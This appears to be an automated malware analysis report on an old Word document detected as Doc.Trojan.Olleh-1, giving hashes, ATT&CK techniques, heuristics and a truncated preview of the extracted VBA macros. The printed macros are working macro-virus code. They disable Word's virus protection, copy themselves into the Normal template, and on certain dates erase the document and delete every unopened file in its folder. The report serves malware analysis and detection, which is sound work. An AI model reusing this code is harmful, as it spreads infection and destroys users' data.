Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4408b28a26c84f56…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 31.5 KB
Created: 2001-05-24 10:27:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 7240e3a1c7d886609207ae9191b37512
SHA-1: 24b52ef89680463ebd1a044c714a6d2920277695
SHA-256: 4408b28a26c84f563f4f290fc478b7d12fc8c125e03397f045443d5a2dfb7a0a
Risk Score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains legacy WordBasic macro markers and a VBA macro named 'hello' with AutoOpen and Auto_Close subroutines. The AutoOpen subroutine attempts to save the document as a template to 'c:\temp.dot' and potentially copy itself to the NormalTemplate, indicating an attempt to establish persistence or spread. The presence of legacy macro virus markers and the ClamAV detection strongly suggest malicious intent.

Heuristics (5)

  • ClamAV: Doc.Trojan.Olleh-1 [severity: critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Olleh-1
  • Legacy WordBasic macro-virus markers [severity: high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected [severity: medium] (OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • AutoOpen macro [severity: high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro [severity: high] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13967 bytes
SHA-256: e41e8a291b9d0cee51fca506ca55e5026d6914bb58182a6e198d899bd1b2ae9b
Detection: ClamAV: Doc.Trojan.Olleh-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hello"
Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.autoopen.autoopen"
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
 RecentFiles.Maximum = 0
On Error GoTo ErrorAO
iMacroCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "hello" Then
        myflag = -1
    End If
Next i
If Not myflag Then

Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name _
        :="hello", Object:=wdOrganizerObjectProjectItems
End If
k = ActiveDocument.FullName
iMacroCount = Application.ActiveDocument.VBProject.VBComponents.Count
For i = 1 To iMacroCount
    If Application.ActiveDocument.VBProject.VBComponents(i).Name = "hello" Then
ActiveDocument.SaveAs FileName:="c:\temp.dot", FileFormat:=wdFormatTemplate
Application.ActiveDocument.SaveAs FileName:=k
End If
Next i
Application.ActiveDocument.SaveAs FileName:=k
Application.OrganizerCopy Source:="c:\temp.dot", Destination:=ActiveDocument.FullName, Name _
        :="hello", Object:=wdOrganizerObjectProjectItems
Application.ActiveDocument.SaveAs FileName:=k
ErrorAO:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
ErrorVVBC:
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
ErrorVVBC:
End Sub
Sub filesave()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
 RecentFiles.Maximum = 0
On Error GoTo ErrorAO
iMacroCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "hello" Then
        myflag = -1
    End If
Next i
If Not myflag Then

Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate.FullName, Name _
        :="hello", Object:=wdOrganizerObjectProjectItems
End If
k = ActiveDocument.FullName
iMacroCount = Application.ActiveDocument.VBProject.VBComponents.Count
For i = 1 To iMacroCount
    If Application.ActiveDocument.VBProject.VBComponents(i).Name = "hello" Then
ActiveDocument.SaveAs FileName:="c:\temp.dot", FileFormat:=wdFormatTemplate
ActiveDocument.SaveAs FileName:=k
End If
Next i
Application.ActiveDocument.Save
Application.OrganizerCopy Source:="c:\temp.dot", Destination:=ActiveDocument.FullName, Name _
        :="hello", Object:=wdOrganizerObjectProjectItems
Application.ActiveDocument.Save
ErrorAO:
End Sub

Sub autoclose()
dt$ = Date
dt$ = Left(dt$, 2)
If dt$ = "05" Then
ActiveDocument.Save
ActiveDocument.Select
Selection.Delete
Selection.TypeText TEXT:="hello :))),"
ActiveDocument.Save
k$ = ActiveDocument.FullName
s$ = ActiveDocument.Name
n = Len(s$)
n1 = Len(k$)
n2 = n1 - n
k$ = Left(k$, n2)
myflag = True
On Error GoTo ErrorAO
myfile = Dir(k$ + "*.*")
Do While myfile <> ""
If myflag = True Then GoTo 1
ErrorAO:
myfile = Dir
1:
myflag = False
flag = False
For i = 1 To Application.Documents.Count
If myfile = Application.Documents(i).Name Then
flag = True
End If
Next i
If flag = False Then
Kill k$ + myfile
End If
Loop
End If

End Sub
Sub FileSaveAs()

On Error GoTo ErrorFSA

    Dialogs(wdDialogFileSaveAs).Show
k$ = ActiveDocument.FullName

n = Len(k$)
n = n - 3
k$ = Left(k$, n)
k$ = k$ & "doc"
ActiveDocument.SaveAs FileName:=k$
k$ = Left(k$, n)
k$ = k$ & "
... (truncated)